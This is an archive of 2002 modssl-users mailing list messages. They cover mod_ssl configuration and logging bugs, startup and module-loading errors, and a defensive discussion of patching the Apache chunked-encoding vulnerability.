Received: from jhaar@trimble.co.nz by thoth.trimble.co.nz by uid 400 with qmail-scanner-1.12 (trophie: 5.500-0829/305/47045. sophie: 2.10/3.58. spamassassin: 2.31. . Clear:. Processed in 0.079722 secs); 26 Jun 2002 02:38:51 -0000
Received: from crom.trimble.co.nz (155.63.248.198)
  by thoth.trimble.co.nz with SMTP; 26 Jun 2002 14:38:50 +1200
Received: (qmail 5547 invoked by uid 500); 26 Jun 2002 02:38:50 -0000
Date: Wed, 26 Jun 2002 14:38:50 +1200
From: Jason Haar 
To: modssl-users@modssl.org
Subject: 2(?) buglets in modssl 2.8.10
Message-ID: <20020626023850.GB27586@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.99i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Redhat Linux, Apache 1.3.26 + modssl-2.8.10

I'm using client certs to authenticate users onto a Reverse Proxy - which
gateways through to backend Web servers.

I've experienced bugs with the pre-2.8.10 release with FakeBasicAuth and so
was keen to see if they were fixed in 2.8.10 (i.e the directory listing bug).

That bug is fixed (yeah!) but another 2(?) are introduced.

1> FakeBasicAuth

Namely the "faked" Basic authentication details are added to the the HTTP
stream, and now that flows back through mod_proxy onto the backend Web
servers - meaning that you can't use Basic authentication on them anymore :-(

I guess that was the fix? Adding these fake Basic auth headers to the stream
makes Apache happy to allow directory listings when it wasn't before - but
other modules such as mod_proxy also get it...

Is there any other way of doing it? 

2> Logging

Currently I have the following:

CustomLog /log/access_log trimble
#Override the CustomLog setting for valid SSL Client Certs
CustomLog /log/access_log trimble-ssl env=SSL_CLIENT_S_DN_Email

>From what I can descern from the Apache documentation, that should mean that
non SSL-client connections get logged according to the "trimble" LogFormat,
whereas SSL-client connections get logged according to the "trimble-ssl".
However, I get TWO log entries for SSL-client connections - it's like it
isn't overriding - it's appending...

Any ideas?

Thanks

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 06:21:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA05271; Wed, 26 Jun 2002 06:20:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id GAA05163; Wed, 26 Jun 2002 06:19:15 +0200 (MET DST)
Received: (qmail 7657 invoked from network); 26 Jun 2002 16:19:12 +1200
Received: from thoth.trimble.co.nz (155.63.248.21)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 26 Jun 2002 16:19:12 +1200
Received: (qmail 28743 invoked by uid 403); 26 Jun 2002 16:19:12 +1200
Received: from jhaar@trimble.co.nz by thoth.trimble.co.nz by uid 400 with qmail-scanner-1.12 (trophie: 5.500-0829/305/47045. sophie: 2.10/3.58. spamassassin: 2.31. . Clear:. Processed in 0.218063 secs); 26 Jun 2002 04:19:12 -0000
Received: from crom.trimble.co.nz (155.63.248.198)
  by thoth.trimble.co.nz with SMTP; 26 Jun 2002 16:19:11 +1200
Received: (qmail 7525 invoked by uid 500); 26 Jun 2002 04:19:11 -0000
Date: Wed, 26 Jun 2002 16:19:11 +1200
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Feature request for error logs (what! not enough detail!?! ;-)
Message-ID: <20020626041911.GC27586@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.99i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We're using client certs and one thing I'd like to see is the SSL error logs
showing me revoked,expired and "faked" certs details on one line. Currently
I see the likes of:

[26/Jun/2002 15:43:55 05724] [error] Certificate Verification: Error (23):
certificate revoked

and

[26/Jun/2002 15:45:20 05725] [error] Certificate Verification: Error (10):
Certificate has expired

and

[26/Jun/2002 16:17:55 05728] [error] Certificate Verification: Error (20):
unable to get local issuer certificate

...couldn't something like the client serial number or DN be added to that
line?

That would then give an easy way to script reports...

Thanks

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 07:16:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA11584; Wed, 26 Jun 2002 07:15:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id HAA11479; Wed, 26 Jun 2002 07:14:11 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id BAA26059;
	Wed, 26 Jun 2002 01:14:49 -0400
Date: Wed, 26 Jun 2002 01:14:49 -0400 (EDT)
From: "R. DuFresne" 
To: Cliff Woolley 
cc: "'modssl-users@modssl.org'" ,
        c.bailiff+bugtraq@devsecure.com, dmarshall@esilicon.com
Subject: Re: Apache Chunking Exploit
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 25 Jun 2002, Cliff Woolley wrote:

> On Tue, 25 Jun 2002, David Marshall wrote:
> 
> > For those of you working to patch your production Apache installations.
> > I have tested and verified Cris Bailiff's interim fix. (see
> > http://online.securityfocus.com/archive/1/278281/2002-06-21/2002-06-27/0).
> 
> That's way overkill.  Please see
> 
> http://www.apache.org/dist/httpd/patches/apply_to_1.3.22/SECURITY_chunk_size_patch.txt
> 
> for a patch that should fix all versions of Apache up to 1.3.22 (you may
> or may not have to apply it to earlier versions by hand, but the logic
> should suffice).  For versions 1.3.23-1.3.25, the best fix is to upgrade
> to 1.3.26 because the proxy was vulnerable in those versions as well as
> the core.
> 
> Note: this patch is only a bandaid -- you should still upgrade ASAP.


The problem has been that walking through the steps to upgrade
apache/mod-ssl in the older versions of apache has always been quite
complicated, and taken sometime to grab up apache, ssl, mm, and all that,
let alone configure it all together.  We've watched in the lists over the
years how often there are cries for help, and how often those cries are
spewed from those just to lazy to read the docs, though even some that do
take time to read get confused.  Thus the release of apache 2 was
welcomed, since the complications were dramatically reduced.  Still , some
of us run older kernels that apache 2 fails under, and until apache 2
works under those older systems, these patches, especially the module
patch, might well be functionable and useful in those implimentations.  I
don't think just blowing them off as overkill is a feasible suggestion in
these circumstances, unless there are issues with the patches put forth.

Certainly no offense is meant here, these are simply my observations and
opinions.


Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 08:18:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA18635; Wed, 26 Jun 2002 08:17:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA18542; Wed, 26 Jun 2002 08:17:02 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A77E24CE797; Wed, 26 Jun 2002 08:16:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id F2AD1287DF; Wed, 26 Jun 2002 08:12:38 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id BAA03672; Wed, 26 Jun 2002 01:12:09 +0200 (MET DST)
Date: Wed, 26 Jun 2002 01:12:09 +0200 (MET DST)
Message-Id: <200206252312.BAA03672@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: Re: [BugDB] Performance issue (PR#723)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Thomas,

I'll try that and send the results to the list.

thank you

On Mon, 2002-06-24 at 05:52, Thomas Binder wrote:
> Hi!
> 
> On Sat, Jun 22, 2002 at 01:49:12AM +0200, modssl-bugdb@modssl.org wrote:
> > This caused a different behavior. I mean, it took a little while
> > (~3 minutes), to the loadav get high, and after a few minutes,
> > it got worse... the loadav reached ~60... Without the
> > "no-threads no-idea -fPIC" options at the openSSL compilation,
> > the high loadav is instantaneous.
> > 
> > I can bring any information you need to debug this problem. Just
> > let me know what do you need.
> 
> What kind of random seed do you use? As far as I know, IRIX has no
> /dev/random (nor /dev/urandom), so I might be a good idea to
> install prngd and let SSLRandomSeed point to its socket (using
> egd:/path/to/socket)
> 
> This might already solve your problem.
> 
> 
> Ciao
> 
> Thomas
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Denis A.V.Jr. - denao@uol.com.br
Systems Engineer - ICQ 2524962
Universo Online

perl -e 'print "computers are like air-conditioners: they stop working
when you open windows ", pack("c*",hex
"3A",sqrt(2025),(unpack(c,"=")-20),10);'


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 08:18:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA18647; Wed, 26 Jun 2002 08:17:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA18534; Wed, 26 Jun 2002 08:17:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 74B7D4CE78D; Wed, 26 Jun 2002 08:16:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 317FE2882B; Wed, 26 Jun 2002 08:12:59 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from siegfried.e-Secure.com.au id HAA15339; Wed, 26 Jun 2002 07:51:12 +0200 (MET DST)
Received: from there (IP-2-34.e-Secure.com.au [203.16.202.34])
	by siegfried.e-Secure.com.au (8.12.1/8.12.1) with SMTP id g5Q5jx36019142;
	Wed, 26 Jun 2002 15:45:59 +1000
Message-Id: <200206260545.g5Q5jx36019142@siegfried.e-Secure.com.au>
Content-Type: text/plain;
  charset="iso-8859-1"
From: c.bailiff+bugtraq@devsecure.com
Organization: /dev/secure Pty Ltd
To: "R. DuFresne" , Cliff Woolley 
Subject: Re: Apache Chunking Exploit
Date: Wed, 26 Jun 2002 15:46:02 +1000
X-Mailer: KMail [version 1.3.2]
Cc: "'modssl-users@modssl.org'" ,
        dmarshall@esilicon.com
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: c.bailiff+bugtraq@devsecure.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Ron and David have understood the real utility of mod_blowchunks:

On Tue, 25 Jun 2002, Cliff Woolley wrote:
> On Tue, 25 Jun 2002, David Marshall wrote:
> > For those of you working to patch your production Apache installations.
> > I have tested and verified Cris Bailiff's interim fix. (see
> > http://online.securityfocus.com/archive/1/278281/2002-06-21/2002-06-27/
> >0).
>
> That's way overkill.  Please see
>
> http://www.apache.org/dist/httpd/patches/apply_to_1.3.22/SECURITY_chunk_s
>ize_patch.txt

Cliff, If you actually read the text of

http://online.securityfocus.com/archive/1/278281/2002-06-21/2002-06-27/

you'll see that I agree with you - upgrade your apache as soon as you can, or 
if you can at least re-compile, add the ASF patch!

In the meantime, mod_blowchunks.c/BlowChunks.pl is designed to be a simple to 
install tweak to your current version, because upgrading and testing all 21+ 
million apache sites is a non-atomic operation.

In many large organisations, with mission-critical apps, BlowChunks.pl (or 
even mod_blowchunks.c) could be in place in minutes as a minor (reversible) 
config change, rather than leaving systems vulnerable during an (expedited) 
2-3 week change management process (or longer!).

On Wed, 26 Jun 2002 15:14, R. DuFresne wrote:
> The problem has been that walking through the steps to upgrade
> apache/mod-ssl in the older versions of apache has always been quite
> complicated, and taken sometime to grab up apache, ssl, mm, and all that,
> let alone configure it all together.  

Precisely, and that's if it's a binary you built yourself in the first place.

I've had many thank-you's from people with IBM HTTP Server, ensim, cobalt, 
Windows users (who often only have binaries and no compiler), etc. who have 
gained breathing room. (I've also had replies from many people using it in 
addition to the upgrade, just to log potential attacks :-) )

Of course, YMMV ;-)

Cris Bailiff 
c.bailiff+blowchunks@devsecure.com - http://www.awayweb.com





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 10:32:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA02373; Wed, 26 Jun 2002 10:31:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.marconi-pensions.co.uk id KAA02357; Wed, 26 Jun 2002 10:31:08 +0200 (MET DST)
Received: from marconi-pensions.co.uk (localhost [127.0.0.1])
	by mailhost.marconi-pensions.co.uk (8.10.2+Sun/8.10.2) with ESMTP id g5Q8V1R28979
	for ; Wed, 26 Jun 2002 09:31:01 +0100 (BST)
Received: from marconi-pensions.co.uk (gallium [211.208.212.31])
	by marconi-pensions.co.uk (8.10.2+Sun/8.10.2) with ESMTP id g5Q8V0B28974
	for ; Wed, 26 Jun 2002 09:31:00 +0100 (BST)
Message-ID: <3D197BC4.2080608@marconi-pensions.co.uk>
Disposition-Notification-To: Dave Kimberley
 
Date: Wed, 26 Jun 2002 09:31:00 +0100
From: Dave Kimberley 
Organization: Marconi plc, Pensions Office
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1
X-Accept-Language: en-gb, en, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache, ssl, and solaris
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Kimberley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



 > Your assert popped on the line that I prefixed with "-->".  Try
 > changing your vhosts to not use "_default_".  I forget exactly which
 > configuration combination causes that error, but it's definitely been
 > seen before.


Hi

I've replaced _default_ in ssl.conf and all now working.

Thanks


Dave

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 12:24:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA13902; Wed, 26 Jun 2002 12:23:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA13890; Wed, 26 Jun 2002 12:23:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id AA1D74CE77F; Wed, 26 Jun 2002 12:23:03 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A141228AE6; Wed, 26 Jun 2002 12:22:45 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from smtp.newtthk.com id LAA05745; Wed, 26 Jun 2002 11:04:03 +0200 (MET DST)
Received: (qmail 20548 invoked from network); 26 Jun 2002 09:16:20 -0000
Received: from unknown (HELO eric) ([202.130.82.229]) (envelope-sender )
          by ns1.newtthk.com (qmail-ldap-1.03) with SMTP
          for ; 26 Jun 2002 09:16:20 -0000
From: "Eric Lai" 
To: 
Subject: Cannot startup the mod_ssl
Date: Wed, 26 Jun 2002 17:03:09 +0800
Message-ID: <002301c21cf0$4b141010$7501a8c0@eric>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0024_01C21D33.59375010"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Eric Lai" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0024_01C21D33.59375010
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hi,

 

After the installation of the mod_ssl, when I type the following
command, 

 

[root@localhost bin]# ./apachectl startssl

./apachectl startssl: httpd could not be started

 

Can you tell me the solution.

Thanks\

Eric


------=_NextPart_000_0024_01C21D33.59375010
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable



















Hi,



 



After the installation of the mod_ssl, when I type =
the following
command, 



 



[root@localhost bin]# ./apachectl =
startssl



./apachectl startssl: httpd could not be =
started



 



Can you tell me the solution.



Thanks\



Eric









------=_NextPart_000_0024_01C21D33.59375010--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 12:37:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA15129; Wed, 26 Jun 2002 12:36:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from slrsdc17.dmz.standardlife.com id MAA15044; Wed, 26 Jun 2002 12:35:28 +0200 (MET DST)
From: michael_pacey@standardlife.com
Received: from SLUKEM01.internal.standardlife.com (slukem01.standardlife.com [172.31.113.108])
	by slrsdc17.dmz.standardlife.com (Pro-8.9.3/Pro-8.9.3) with ESMTP id LAA23542
	for ; Wed, 26 Jun 2002 11:35:22 +0100
Received: from slukdcn4.internal.standardlife.com (slukdcn4.standardlife.com [172.31.113.107])
	by SLUKEM01.internal.standardlife.com (4.6.1.91) with ESMTP id 
	for ; Wed, 26 Jun 2002 11:30:49 +0100
Subject: Re: Cannot startup the mod_ssl
To: 
X-Mailer: Lotus Notes Release 5.0.2c (Intl) 2 February 2000
Message-ID: 
Date: Wed, 26 Jun 2002 11:35:04 +0100
X-MIMETrack: Serialize by Router on SLUKDCN4/STANDARD LIFE ASSURANCE COMPANY(Release 5.0.5
 |September 22, 2000) at 26/06/2002 11:28:53
MIME-Version: 1.0 (Generated by Clearswift ES version 4.6.1.121)
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: michael_pacey@standardlife.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


try ./apachectl configtest
then make sure your not already running something on port 80 / 443


                                                                                                           
                                                                                       
                    Sent by:                     To:                              
                                       Subject:     Cannot startup the mod_ssl                   
                                                                                                           
                                                                                                           
                    26/06/2002 10:03                                                                       
                    Please respond to                                                                      
                    modssl-users                                                                           
                                                                                                           
                                                                                                           



Hi,

After the installation of the mod_ssl, when I type the following command,

[root@localhost bin]# ./apachectl startssl
./apachectl startssl: httpd could not be started

Can you tell me the solution.
Thanks\
Eric





For more information on Standard Life, visit our website
http://www.standardlife.com/

The Standard Life Assurance Company, Standard Life House, 30 Lothian Road,
Edinburgh EH1 2DH, is registered in Scotland (No. SZ4) and regulated by the
Financial Services Authority. Tel: 0131 225 2552 - calls may be recorded or
monitored. This confidential e-mail is for the addressee only. If received
in error, do not retain/copy/disclose it without our consent and please
return it to us. We virus scan and monitor all e-mails but are not
responsible for any damage caused by a virus or alteration by a third party
after it is sent.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 14:29:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA26807; Wed, 26 Jun 2002 14:28:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from snmsu2.montrouge.omnes.slb.com id OAA26760; Wed, 26 Jun 2002 14:27:51 +0200 (MET DST)
Received: from snmsu1.montrouge.omnes.slb.com (snmsu1 [163.187.152.2])
	by snmsu2.montrouge.omnes.slb.com (8.9.3/8.9.3) with ESMTP id OAA08487
	for ; Wed, 26 Jun 2002 14:25:34 +0200 (MET DST)
Received: from AHOUANGONOU-ETM.montrouge.sema.slb.com (ttmdy019089.montrouge.tt.slb.com [163.187.19.89])
	by snmsu1.montrouge.omnes.slb.com (8.9.3/8.9.1) with ESMTP id OAA01539
	for ; Wed, 26 Jun 2002 14:21:34 +0200 (MET DST)
Message-Id: <5.0.0.25.2.20020626142957.02943760@popper.montrouge.tt.slb.com>
X-Sender: asoedibj@popper.montrouge.tt.slb.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0
Date: Wed, 26 Jun 2002 14:38:58 +0200
To: modssl-users@modssl.org
From: Andy Soedibjo 
Subject: Newbies : Apache - mod-ssl error
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_445280209==_.ALT"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andy Soedibjo 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--=====================_445280209==_.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed

Hi,

I tried to install Apache1.3.26 - mod-ssl2.8.9-1.3.26 - OpenSSL0.9.6d in 
windows2000.
I think i've succeeded to install everything.

Now for Apache, i can run it without SSL.
But, if i try to add LoadModule ssl_module modules/mod_ssl.so
and run it ... it returns error :
Syntax error on line 192 of d:/apache/conf/httpd.conf:
Cannot load /apache/modules/mod_ssl.so into server: (126) The specified 
module could not be found:

i'm sure i've put the mod_ssl.so in the modules directory with others 
Apache modules.
I've tried to used the full directory LoadModule ssl_module 
D:/Apache/modules/mod_ssl.so
but, still get the same error.
Syntax error on line 192 of d:/apache/conf/httpd.conf:
Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified 
module could not be found:

Does anyone knows what's wrong? Any suggestion will be accepted.

Thanks in advance,
Andy.


--=====================_445280209==_.ALT
Content-Type: text/html; charset="us-ascii"


Hi, 



I tried to install Apache1.3.26 - mod-ssl2.8.9-1.3.26 - OpenSSL0.9.6d in
windows2000.

I think i've succeeded to install everything. 



Now for Apache, i can run it without SSL.

But, if i try to add LoadModule ssl_module modules/mod_ssl.so

and run it ... it returns error : 

Syntax error on line 192 of
d:/apache/conf/httpd.conf:

Cannot load /apache/modules/mod_ssl.so into server: (126) The specified
module could not be found:



i'm sure i've put the mod_ssl.so in the modules directory with
others Apache modules.

I've tried to used the full directory LoadModule ssl_module
D:/Apache/modules/mod_ssl.so

but, still get the same error.

Syntax error on line 192 of
d:/apache/conf/httpd.conf:

Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified
module could not be found:



Does anyone knows what's wrong? Any suggestion will be
accepted.



Thanks in advance,

Andy.





--=====================_445280209==_.ALT--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 16:06:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA07253; Wed, 26 Jun 2002 16:05:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from snmsu2.montrouge.omnes.slb.com id QAA07113; Wed, 26 Jun 2002 16:03:56 +0200 (MET DST)
Received: from snmsu1.montrouge.omnes.slb.com (snmsu1 [163.187.152.2])
	by snmsu2.montrouge.omnes.slb.com (8.9.3/8.9.3) with ESMTP id QAA24704
	for ; Wed, 26 Jun 2002 16:01:31 +0200 (MET DST)
Received: from AHOUANGONOU-ETM.montrouge.sema.slb.com (ttmdy019089.montrouge.tt.slb.com [163.187.19.89])
	by snmsu1.montrouge.omnes.slb.com (8.9.3/8.9.1) with ESMTP id PAA11086
	for ; Wed, 26 Jun 2002 15:57:32 +0200 (MET DST)
Message-Id: <5.0.0.25.2.20020626161424.028e29e0@popper.montrouge.tt.slb.com>
X-Sender: asoedibj@popper.montrouge.tt.slb.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0
Date: Wed, 26 Jun 2002 16:15:09 +0200
To: modssl-users@modssl.org
From: Andy Soedibjo 
Subject: Newbies : Apache - mod-ssl error
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_232574==_.ALT"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andy Soedibjo 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--=====================_232574==_.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed


>Hi,
>
>I tried to install Apache1.3.26 - mod-ssl2.8.9-1.3.26 - OpenSSL0.9.6d in 
>windows2000.
>I think i've succeeded to install everything.
>
>Now for Apache, i can run it without SSL.
>But, if i try to add LoadModule ssl_module modules/mod_ssl.so
>and run it ... it returns error :
>Syntax error on line 192 of d:/apache/conf/httpd.conf:
>Cannot load /apache/modules/mod_ssl.so into server: (126) The specified 
>module could not be found:
>
>i'm sure i've put the mod_ssl.so in the modules directory with others 
>Apache modules.
>I've tried to used the full directory LoadModule ssl_module 
>D:/Apache/modules/mod_ssl.so
>but, still get the same error.
>Syntax error on line 192 of d:/apache/conf/httpd.conf:
>Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified 
>module could not be found:
>
>Does anyone knows what's wrong? Any suggestion will be accepted.
>
>Thanks in advance,
>Andy.


--=====================_232574==_.ALT
Content-Type: text/html; charset="us-ascii"



Hi, 



I tried to install Apache1.3.26 - mod-ssl2.8.9-1.3.26 - OpenSSL0.9.6d in
windows2000.

I think i've succeeded to install everything. 



Now for Apache, i can run it without SSL.

But, if i try to add LoadModule ssl_module modules/mod_ssl.so

and run it ... it returns error : 

Syntax error on line 192 of
d:/apache/conf/httpd.conf:

Cannot load /apache/modules/mod_ssl.so into server: (126) The specified
module could not be found:



i'm sure i've put the mod_ssl.so in the modules directory with
others Apache modules.

I've tried to used the full directory LoadModule ssl_module
D:/Apache/modules/mod_ssl.so

but, still get the same error.

Syntax error on line 192 of
d:/apache/conf/httpd.conf:

Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified
module could not be found:



Does anyone knows what's wrong? Any suggestion will be
accepted.



Thanks in advance,

Andy.




--=====================_232574==_.ALT--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 16:22:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA09318; Wed, 26 Jun 2002 16:21:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id QAA09199; Wed, 26 Jun 2002 16:20:10 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA29460
	for ; Wed, 26 Jun 2002 10:21:16 -0400
Date: Wed, 26 Jun 2002 10:21:16 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Newbies : Apache - mod-ssl error
In-Reply-To: <5.0.0.25.2.20020626142957.02943760@popper.montrouge.tt.slb.com>
Message-ID: 
Organization: sysinfo.com
